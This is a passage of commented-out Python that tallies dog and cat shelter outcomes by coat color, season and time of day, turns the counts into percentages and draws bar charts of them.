# if data[i][5] == 'Dog' and data[i][3] == 'Euthanasia' and data[i][9] == 'MixedColor':
# MixedColorDogsEuthanized += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Adoption' and data[i][9] == 'SolidColor':
# SolidColorCatsAdopted += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Died' and data[i][9] == 'SolidColor':
# SolidColorCatsDied += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Transfer' and data[i][9] == 'SolidColor':
# SolidColorCatsTransfered += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Return_to_owner' and data[i][9] == 'SolidColor':
# SolidColorCatsReturnedToOwners += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Euthanasia' and data[i][9] == 'SolidColor':
# SolidColorCatsEuthanized += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Adoption' and data[i][9] == 'MixedColor':
# MixedColorCatsAdopted += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Died' and data[i][9] == 'MixedColor':
# MixedColorCatsDied += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Transfer' and data[i][9] == 'MixedColor':
# MixedColorCatsTransfered += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Return_to_owner' and data[i][9] == 'MixedColor':
# MixedColorCatsReturnedToOwners += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Euthanasia' and data[i][9] == 'MixedColor':
# MixedColorCatsEuthanized += 1
#numSolidColorDogs = 0
#numMixedColorDogs = 0
#numSolidColorCats = 0
#numMixedColorCats = 0
#for i in range(len(dataVectors)):
# if data[i][5] == 'Dog' and data[i][9] == 'SolidColor':
# numSolidColorDogs += 1
# if data[i][5] == 'Dog' and data[i][9] == 'MixedColor':
# numMixedColorDogs += 1
# if data[i][5] == 'Cat' and data[i][9] == 'SolidColor':
# numSolidColorCats += 1
# if data[i][5] == 'Cat' and data[i][9] == 'MixedColor':
# numMixedColorCats += 1
#percentageSolidColorDogsAdopted = SolidColorDogsAdopted/numSolidColorDogs*100
#percentageSolidColorDogsDied = SolidColorDogsDied/numSolidColorDogs*100
#percentageSolidColorDogsTransfered = SolidColorDogsTransfered/numSolidColorDogs*100
#percentageSolidColorDogsReturnToOwners = SolidColorDogsReturnedToOwners/numSolidColorDogs*100
#percentageSolidColorDogsEuthanized = SolidColorDogsEuthanized/numSolidColorDogs*100
#percentageSolidColorDogsOutcomes = [percentageSolidColorDogsAdopted, percentageSolidColorDogsDied, percentageSolidColorDogsTransfered, percentageSolidColorDogsReturnToOwners, percentageSolidColorDogsEuthanized]
#percentageMixedColorDogsAdopted = MixedColorDogsAdopted/numMixedColorDogs*100
#percentageMixedColorDogsDied = MixedColorDogsDied/numMixedColorDogs*100
#percentageMixedColorDogsTransfered = MixedColorDogsTransfered/numMixedColorDogs*100
#percentageMixedColorDogsReturnToOwners = MixedColorDogsReturnedToOwners/numMixedColorDogs*100
#percentageMixedColorDogsEuthanized = MixedColorDogsEuthanized/numMixedColorDogs*100
#percentageMixedColorDogsOutcomes = [percentageMixedColorDogsAdopted, percentageMixedColorDogsDied, percentageMixedColorDogsTransfered, percentageMixedColorDogsReturnToOwners, percentageMixedColorDogsEuthanized]
#percentageSolidColorCatsAdopted = SolidColorCatsAdopted/numSolidColorCats*100
#percentageSolidColorCatsDied = SolidColorCatsDied/numSolidColorCats*100
#percentageSolidColorCatsTransfered = SolidColorCatsTransfered/numSolidColorCats*100
#percentageSolidColorCatsReturnToOwners = SolidColorCatsReturnedToOwners/numSolidColorCats*100
#percentageSolidColorCatsEuthanized = SolidColorCatsEuthanized/numSolidColorCats*100
#percentageSolidColorCatsOutcomes = [percentageSolidColorCatsAdopted, percentageSolidColorCatsDied, percentageSolidColorCatsTransfered, percentageSolidColorCatsReturnToOwners, percentageSolidColorCatsEuthanized]
#percentageMixedColorCatsAdopted = MixedColorCatsAdopted/numMixedColorCats*100
#percentageMixedColorCatsDied = MixedColorCatsDied/numMixedColorCats*100
#percentageMixedColorCatsTransfered = MixedColorCatsTransfered/numMixedColorCats*100
#percentageMixedColorCatsReturnToOwners = MixedColorCatsReturnedToOwners/numMixedColorCats*100
#percentageMixedColorCatsEuthanized = MixedColorCatsEuthanized/numMixedColorCats*100
#percentageMixedColorCatsOutcomes = [percentageMixedColorCatsAdopted, percentageMixedColorCatsDied, percentageMixedColorCatsTransfered, percentageMixedColorCatsReturnToOwners, percentageMixedColorCatsEuthanized]
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageSolidColorDogsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Solid Color Dog Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageMixedColorDogsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Mixed Color Dog Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageSolidColorCatsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Solid Color Cat Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageMixedColorCatsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Mixed Color Cat Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#SpringDogsAdopted = 0
#SpringDogsDied = 0
#SpringDogsTransfered = 0
#SpringDogsReturnedToOwners = 0
#SpringDogsEuthanized = 0
#SummerDogsAdopted = 0
#SummerDogsDied = 0
#SummerDogsTransfered = 0
#SummerDogsReturnedToOwners = 0
#SummerDogsEuthanized = 0
#FallDogsAdopted = 0
#FallDogsDied = 0
#FallDogsTransfered = 0
#FallDogsReturnedToOwners = 0
#FallDogsEuthanized = 0
#WinterDogsAdopted = 0
#WinterDogsDied = 0
#WinterDogsTransfered = 0
#WinterDogsReturnedToOwners = 0
#WinterDogsEuthanized = 0
#SpringCatsAdopted = 0
#SpringCatsDied = 0
#SpringCatsTransfered = 0
#SpringCatsReturnedToOwners = 0
#SpringCatsEuthanized = 0
#SummerCatsAdopted = 0
#SummerCatsDied = 0
#SummerCatsTransfered = 0
#SummerCatsReturnedToOwners = 0
#SummerCatsEuthanized = 0
#FallCatsAdopted = 0
#FallCatsDied = 0
#FallCatsTransfered = 0
#FallCatsReturnedToOwners = 0
#FallCatsEuthanized = 0
#WinterCatsAdopted = 0
#WinterCatsDied = 0
#WinterCatsTransfered = 0
#WinterCatsReturnedToOwners = 0
#WinterCatsEuthanized = 0
#for i in range(len(dataVectors)):
# if data[i][5] == 'Dog' and data[i][3] == 'Adoption' and data[i][1] == 'Spring':
# SpringDogsAdopted += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Died' and data[i][1] == 'Spring':
# SpringDogsDied += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Transfer' and data[i][1] == 'Spring':
# SpringDogsTransfered += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Return_to_owner' and data[i][1] == 'Spring':
# SpringDogsReturnedToOwners += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Euthanasia' and data[i][1] == 'Spring':
# SpringDogsEuthanized += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Adoption' and data[i][1] == 'Summer':
# SummerDogsAdopted += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Died' and data[i][1] == 'Summer':
# SummerDogsDied += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Transfer' and data[i][1] == 'Summer':
# SummerDogsTransfered += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Return_to_owner' and data[i][1] == 'Summer':
# SummerDogsReturnedToOwners += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Euthanasia' and data[i][1] == 'Summer':
# SummerDogsEuthanized += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Adoption' and data[i][1] == 'Fall':
# FallDogsAdopted += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Died' and data[i][1] == 'Fall':
# FallDogsDied += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Transfer' and data[i][1] == 'Fall':
# FallDogsTransfered += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Return_to_owner' and data[i][1] == 'Fall':
# FallDogsReturnedToOwners += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Euthanasia' and data[i][1] == 'Fall':
# FallDogsEuthanized += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Adoption' and data[i][1] == 'Winter':
# WinterDogsAdopted += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Died' and data[i][1] == 'Winter':
# WinterDogsDied += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Transfer' and data[i][1] == 'Winter':
# WinterDogsTransfered += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Return_to_owner' and data[i][1] == 'Winter':
# WinterDogsReturnedToOwners += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Euthanasia' and data[i][1] == 'Winter':
# WinterDogsEuthanized += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Adoption' and data[i][1] == 'Spring':
# SpringCatsAdopted += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Died' and data[i][1] == 'Spring':
# SpringCatsDied += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Transfer' and data[i][1] == 'Spring':
# SpringCatsTransfered += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Return_to_owner' and data[i][1] == 'Spring':
# SpringCatsReturnedToOwners += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Euthanasia' and data[i][1] == 'Spring':
# SpringCatsEuthanized += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Adoption' and data[i][1] == 'Summer':
# SummerCatsAdopted += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Died' and data[i][1] == 'Summer':
# SummerCatsDied += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Transfer' and data[i][1] == 'Summer':
# SummerCatsTransfered += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Return_to_owner' and data[i][1] == 'Summer':
# SummerCatsReturnedToOwners += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Euthanasia' and data[i][1] == 'Summer':
# SummerCatsEuthanized += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Adoption' and data[i][1] == 'Fall':
# FallCatsAdopted += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Died' and data[i][1] == 'Fall':
# FallCatsDied += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Transfer' and data[i][1] == 'Fall':
# FallCatsTransfered += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Return_to_owner' and data[i][1] == 'Fall':
# FallCatsReturnedToOwners += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Euthanasia' and data[i][1] == 'Fall':
# FallCatsEuthanized += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Adoption' and data[i][1] == 'Winter':
# WinterCatsAdopted += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Died' and data[i][1] == 'Winter':
# WinterCatsDied += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Transfer' and data[i][1] == 'Winter':
# WinterCatsTransfered += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Return_to_owner' and data[i][1] == 'Winter':
# WinterCatsReturnedToOwners += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Euthanasia' and data[i][1] == 'Winter':
# WinterCatsEuthanized += 1
#numSpringDogs = 0
#numSummerDogs = 0
#numFallDogs = 0
#numWinterDogs = 0
#numSpringCats = 0
#numSummerCats = 0
#numFallCats = 0
#numWinterCats = 0
#for i in range(len(dataVectors)):
# if data[i][5] == 'Dog' and data[i][1] == 'Spring':
# numSpringDogs += 1
# if data[i][5] == 'Dog' and data[i][1] == 'Summer':
# numSummerDogs += 1
# if data[i][5] == 'Dog' and data[i][1] == 'Fall':
# numFallDogs += 1
# if data[i][5] == 'Dog' and data[i][1] == 'Winter':
# numWinterDogs += 1
# if data[i][5] == 'Cat' and data[i][1] == 'Spring':
# numSpringCats += 1
# if data[i][5] == 'Cat' and data[i][1] == 'Summer':
# numSummerCats += 1
# if data[i][5] == 'Cat' and data[i][1] == 'Fall':
# numFallCats += 1
# if data[i][5] == 'Cat' and data[i][1] == 'Winter':
# numWinterCats += 1
#percentageSpringDogsAdopted = SpringDogsAdopted/numSpringDogs*100
#percentageSpringDogsDied = SpringDogsDied/numSpringDogs*100
#percentageSpringDogsTransfered = SpringDogsTransfered/numSpringDogs*100
#percentageSpringDogsReturnToOwners = SpringDogsReturnedToOwners/numSpringDogs*100
#percentageSpringDogsEuthanized = SpringDogsEuthanized/numSpringDogs*100
#percentageSpringDogsOutcomes = [percentageSpringDogsAdopted, percentageSpringDogsDied, percentageSpringDogsTransfered, percentageSpringDogsReturnToOwners, percentageSpringDogsEuthanized]
#percentageSummerDogsAdopted = SummerDogsAdopted/numSummerDogs*100
#percentageSummerDogsDied = SummerDogsDied/numSummerDogs*100
#percentageSummerDogsTransfered = SummerDogsTransfered/numSummerDogs*100
#percentageSummerDogsReturnToOwners = SummerDogsReturnedToOwners/numSummerDogs*100
#percentageSummerDogsEuthanized = SummerDogsEuthanized/numSummerDogs*100
#percentageSummerDogsOutcomes = [percentageSummerDogsAdopted, percentageSummerDogsDied, percentageSummerDogsTransfered, percentageSummerDogsReturnToOwners, percentageSummerDogsEuthanized]
#percentageFallDogsAdopted = FallDogsAdopted/numFallDogs*100
#percentageFallDogsDied = FallDogsDied/numFallDogs*100
#percentageFallDogsTransfered = FallDogsTransfered/numFallDogs*100
#percentageFallDogsReturnToOwners = FallDogsReturnedToOwners/numFallDogs*100
#percentageFallDogsEuthanized = FallDogsEuthanized/numFallDogs*100
#percentageFallDogsOutcomes = [percentageFallDogsAdopted, percentageFallDogsDied, percentageFallDogsTransfered, percentageFallDogsReturnToOwners, percentageFallDogsEuthanized]
#percentageWinterDogsAdopted = WinterDogsAdopted/numWinterDogs*100
#percentageWinterDogsDied = WinterDogsDied/numWinterDogs*100
#percentageWinterDogsTransfered = WinterDogsTransfered/numWinterDogs*100
#percentageWinterDogsReturnToOwners = WinterDogsReturnedToOwners/numWinterDogs*100
#percentageWinterDogsEuthanized = WinterDogsEuthanized/numWinterDogs*100
#percentageWinterDogsOutcomes = [percentageWinterDogsAdopted, percentageWinterDogsDied, percentageWinterDogsTransfered, percentageWinterDogsReturnToOwners, percentageWinterDogsEuthanized]
#percentageSpringCatsAdopted = SpringCatsAdopted/numSpringCats*100
#percentageSpringCatsDied = SpringCatsDied/numSpringCats*100
#percentageSpringCatsTransfered = SpringCatsTransfered/numSpringCats*100
#percentageSpringCatsReturnToOwners = SpringCatsReturnedToOwners/numSpringCats*100
#percentageSpringCatsEuthanized = SpringCatsEuthanized/numSpringCats*100
#percentageSpringCatsOutcomes = [percentageSpringCatsAdopted, percentageSpringCatsDied, percentageSpringCatsTransfered, percentageSpringCatsReturnToOwners, percentageSpringCatsEuthanized]
#percentageSummerCatsAdopted = SummerCatsAdopted/numSummerCats*100
#percentageSummerCatsDied = SummerCatsDied/numSummerCats*100
#percentageSummerCatsTransfered = SummerCatsTransfered/numSummerCats*100
#percentageSummerCatsReturnToOwners = SummerCatsReturnedToOwners/numSummerCats*100
#percentageSummerCatsEuthanized = SummerCatsEuthanized/numSummerCats*100
#percentageSummerCatsOutcomes = [percentageSummerCatsAdopted, percentageSummerCatsDied, percentageSummerCatsTransfered, percentageSummerCatsReturnToOwners, percentageSummerCatsEuthanized]
#percentageFallCatsAdopted = FallCatsAdopted/numFallCats*100
#percentageFallCatsDied = FallCatsDied/numFallCats*100
#percentageFallCatsTransfered = FallCatsTransfered/numFallCats*100
#percentageFallCatsReturnToOwners = FallCatsReturnedToOwners/numFallCats*100
#percentageFallCatsEuthanized = FallCatsEuthanized/numFallCats*100
#percentageFallCatsOutcomes = [percentageFallCatsAdopted, percentageFallCatsDied, percentageFallCatsTransfered, percentageFallCatsReturnToOwners, percentageFallCatsEuthanized]
#percentageWinterCatsAdopted = WinterCatsAdopted/numWinterCats*100
#percentageWinterCatsDied = WinterCatsDied/numWinterCats*100
#percentageWinterCatsTransfered = WinterCatsTransfered/numWinterCats*100
#percentageWinterCatsReturnToOwners = WinterCatsReturnedToOwners/numWinterCats*100
#percentageWinterCatsEuthanized = WinterCatsEuthanized/numWinterCats*100
#percentageWinterCatsOutcomes = [percentageWinterCatsAdopted, percentageWinterCatsDied, percentageWinterCatsTransfered, percentageWinterCatsReturnToOwners, percentageWinterCatsEuthanized]
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageSpringDogsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Spring Dog Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageSummerDogsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Summer Dog Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageFallDogsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Fall Dog Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageWinterDogsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Winter Dog Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageSpringCatsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Spring Cat Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageSummerCatsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Summer Cat Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageFallCatsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Fall Cat Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageWinterCatsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Winter Cat Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#MorningDogsAdopted = 0
#MorningDogsDied = 0
#MorningDogsTransfered = 0
#MorningDogsReturnedToOwners = 0
#MorningDogsEuthanized = 0
#AfternoonDogsAdopted = 0
#AfternoonDogsDied = 0
#AfternoonDogsTransfered = 0
#AfternoonDogsReturnedToOwners = 0
#AfternoonDogsEuthanized = 0
#NightDogsAdopted = 0
#NightDogsDied = 0
#NightDogsTransfered = 0
#NightDogsReturnedToOwners = 0
#NightDogsEuthanized = 0
#MorningCatsAdopted = 0
#MorningCatsDied = 0
#MorningCatsTransfered = 0
#MorningCatsReturnedToOwners = 0
#MorningCatsEuthanized = 0
#AfternoonCatsAdopted = 0
#AfternoonCatsDied = 0
#AfternoonCatsTransfered = 0
#AfternoonCatsReturnedToOwners = 0
#AfternoonCatsEuthanized = 0
#NightCatsAdopted = 0
#NightCatsDied = 0
#NightCatsTransfered = 0
#NightCatsReturnedToOwners = 0
#NightCatsEuthanized = 0
#for i in range(len(dataVectors)):
# if data[i][5] == 'Dog' and data[i][3] == 'Adoption' and data[i][2] == 'Morning':
# MorningDogsAdopted += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Died' and data[i][2] == 'Morning':
# MorningDogsDied += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Transfer' and data[i][2] == 'Morning':
# MorningDogsTransfered += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Return_to_owner' and data[i][2] == 'Morning':
# MorningDogsReturnedToOwners += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Euthanasia' and data[i][2] == 'Morning':
# MorningDogsEuthanized += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Adoption' and data[i][2] == 'Afternoon':
# AfternoonDogsAdopted += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Died' and data[i][2] == 'Afternoon':
# AfternoonDogsDied += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Transfer' and data[i][2] == 'Afternoon':
# AfternoonDogsTransfered += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Return_to_owner' and data[i][2] == 'Afternoon':
# AfternoonDogsReturnedToOwners += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Euthanasia' and data[i][2] == 'Afternoon':
# AfternoonDogsEuthanized += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Adoption' and data[i][2] == 'Night':
# NightDogsAdopted += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Died' and data[i][2] == 'Night':
# NightDogsDied += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Transfer' and data[i][2] == 'Night':
# NightDogsTransfered += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Return_to_owner' and data[i][2] == 'Night':
# NightDogsReturnedToOwners += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Euthanasia' and data[i][2] == 'Night':
# NightDogsEuthanized += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Adoption' and data[i][2] == 'Morning':
# MorningCatsAdopted += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Died' and data[i][2] == 'Morning':
# MorningCatsDied += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Transfer' and data[i][2] == 'Morning':
# MorningCatsTransfered += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Return_to_owner' and data[i][2] == 'Morning':
# MorningCatsReturnedToOwners += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Euthanasia' and data[i][2] == 'Morning':
# MorningCatsEuthanized += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Adoption' and data[i][2] == 'Afternoon':
# AfternoonCatsAdopted += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Died' and data[i][2] == 'Afternoon':
# AfternoonCatsDied += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Transfer' and data[i][2] == 'Afternoon':
# AfternoonCatsTransfered += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Return_to_owner' and data[i][2] == 'Afternoon':
# AfternoonCatsReturnedToOwners += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Euthanasia' and data[i][2] == 'Afternoon':
# AfternoonCatsEuthanized += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Adoption' and data[i][2] == 'Night':
# NightCatsAdopted += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Died' and data[i][2] == 'Night':
# NightCatsDied += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Transfer' and data[i][2] == 'Night':
# NightCatsTransfered += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Return_to_owner' and data[i][2] == 'Night':
# NightCatsReturnedToOwners += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Euthanasia' and data[i][2] == 'Night':
# NightCatsEuthanized += 1
#numMorningDogs = 0
#numAfternoonDogs = 0
#numNightDogs = 0
#numMorningCats = 0
#numAfternoonCats = 0
#numNightCats = 0
#for i in range(len(dataVectors)):
# if data[i][5] == 'Dog' and data[i][2] == 'Morning':
# numMorningDogs += 1
# if data[i][5] == 'Dog' and data[i][2] == 'Afternoon':
# numAfternoonDogs += 1
# if data[i][5] == 'Dog' and data[i][2] == 'Night':
# numNightDogs += 1
# if data[i][5] == 'Cat' and data[i][2] == 'Morning':
# numMorningCats += 1
# if data[i][5] == 'Cat' and data[i][2] == 'Afternoon':
# numAfternoonCats += 1
# if data[i][5] == 'Cat' and data[i][2] == 'Night':
# numNightCats += 1
#percentageMorningDogsAdopted = MorningDogsAdopted/numMorningDogs*100
#percentageMorningDogsDied = MorningDogsDied/numMorningDogs*100
#percentageMorningDogsTransfered = MorningDogsTransfered/numMorningDogs*100
#percentageMorningDogsReturnToOwners = MorningDogsReturnedToOwners/numMorningDogs*100
#percentageMorningDogsEuthanized = MorningDogsEuthanized/numMorningDogs*100
#percentageMorningDogsOutcomes = [percentageMorningDogsAdopted, percentageMorningDogsDied, percentageMorningDogsTransfered, percentageMorningDogsReturnToOwners, percentageMorningDogsEuthanized]
#percentageAfternoonDogsAdopted = AfternoonDogsAdopted/numAfternoonDogs*100
#percentageAfternoonDogsDied = AfternoonDogsDied/numAfternoonDogs*100
#percentageAfternoonDogsTransfered = AfternoonDogsTransfered/numAfternoonDogs*100
#percentageAfternoonDogsReturnToOwners = AfternoonDogsReturnedToOwners/numAfternoonDogs*100
#percentageAfternoonDogsEuthanized = AfternoonDogsEuthanized/numAfternoonDogs*100
#percentageAfternoonDogsOutcomes = [percentageAfternoonDogsAdopted, percentageAfternoonDogsDied, percentageAfternoonDogsTransfered, percentageAfternoonDogsReturnToOwners, percentageAfternoonDogsEuthanized]
#percentageNightDogsAdopted = NightDogsAdopted/numNightDogs*100
#percentageNightDogsDied = NightDogsDied/numNightDogs*100
#percentageNightDogsTransfered = NightDogsTransfered/numNightDogs*100
#percentageNightDogsReturnToOwners = NightDogsReturnedToOwners/numNightDogs*100
#percentageNightDogsEuthanized = NightDogsEuthanized/numNightDogs*100
#percentageNightDogsOutcomes = [percentageNightDogsAdopted, percentageNightDogsDied, percentageNightDogsTransfered, percentageNightDogsReturnToOwners, percentageNightDogsEuthanized]
#percentageMorningCatsAdopted = MorningCatsAdopted/numMorningCats*100
#percentageMorningCatsDied = MorningCatsDied/numMorningCats*100
#percentageMorningCatsTransfered = MorningCatsTransfered/numMorningCats*100
#percentageMorningCatsReturnToOwners = MorningCatsReturnedToOwners/numMorningCats*100
#percentageMorningCatsEuthanized = MorningCatsEuthanized/numMorningCats*100
#percentageMorningCatsOutcomes = [percentageMorningCatsAdopted, percentageMorningCatsDied, percentageMorningCatsTransfered, percentageMorningCatsReturnToOwners, percentageMorningCatsEuthanized]
#percentageAfternoonCatsAdopted = AfternoonCatsAdopted/numAfternoonCats*100
#percentageAfternoonCatsDied = AfternoonCatsDied/numAfternoonCats*100
#percentageAfternoonCatsTransfered = AfternoonCatsTransfered/numAfternoonCats*100
#percentageAfternoonCatsReturnToOwners = AfternoonCatsReturnedToOwners/numAfternoonCats*100
#percentageAfternoonCatsEuthanized = AfternoonCatsEuthanized/numAfternoonCats*100
#percentageAfternoonCatsOutcomes = [percentageAfternoonCatsAdopted, percentageAfternoonCatsDied, percentageAfternoonCatsTransfered, percentageAfternoonCatsReturnToOwners, percentageAfternoonCatsEuthanized]
#percentageNightCatsAdopted = NightCatsAdopted/numNightCats*100
#percentageNightCatsDied = NightCatsDied/numNightCats*100
#percentageNightCatsTransfered = NightCatsTransfered/numNightCats*100
#percentageNightCatsReturnToOwners = NightCatsReturnedToOwners/numNightCats*100
#percentageNightCatsEuthanized = NightCatsEuthanized/numNightCats*100
#percentageNightCatsOutcomes = [percentageNightCatsAdopted, percentageNightCatsDied, percentageNightCatsTransfered, percentageNightCatsReturnToOwners, percentageNightCatsEuthanized]
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageMorningDogsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Morning Dog Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageAfternoonDogsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Afternoon Dog Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageNightDogsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Night Dog Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageMorningCatsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Morning Cat Outcomes')
